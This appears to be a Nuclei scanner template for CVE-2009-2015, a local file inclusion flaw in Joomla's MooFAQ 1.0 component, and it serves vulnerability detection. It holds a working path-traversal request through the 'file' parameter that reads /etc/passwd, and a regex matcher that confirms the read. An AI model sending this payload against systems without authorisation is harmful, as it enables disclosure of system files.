42 lines
1.4 KiB
YAML
42 lines
1.4 KiB
YAML
id: CVE-2009-2015
|
|
|
|
info:
|
|
name: Joomla! MooFAQ 1.0 - Local File Inclusion
|
|
author: daffainfo
|
|
severity: high
|
|
description: Joomla! Ideal MooFAQ 1.0 via com_moofaq allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter (local file inclusion).
|
|
remediation: |
|
|
Update Joomla! MooFAQ to the latest version or apply the official patch provided by the vendor.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/8898
|
|
- http://www.vupen.com/english/advisories/2009/1530
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2009-2015
|
|
classification:
|
|
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2009-2015
|
|
cwe-id: CWE-22
|
|
epss-score: 0.00797
|
|
epss-percentile: 0.79631
|
|
cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: joomla
|
|
product: joomla
|
|
tags: joomla,lfi,edb,cve,cve2009
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a0047304502201a3eef5e2f64a186e909b1f12743cf3c9b540f08ebb437dcffe83f5becdac1c5022100cd4cb7a983746ae703d14b65a0e0a8ba41007a0b74d3fb41d42a4557720bdc58:922c64590222798bb761d5b6d8e72950 |